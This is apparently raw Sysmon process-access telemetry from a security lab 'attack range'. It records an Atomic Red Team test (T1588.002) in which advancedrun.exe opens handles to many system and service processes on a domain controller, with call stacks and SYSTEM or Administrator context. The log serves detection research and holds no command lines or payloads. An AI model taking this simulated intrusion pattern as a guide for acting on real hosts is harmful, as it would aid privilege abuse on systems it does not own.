17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 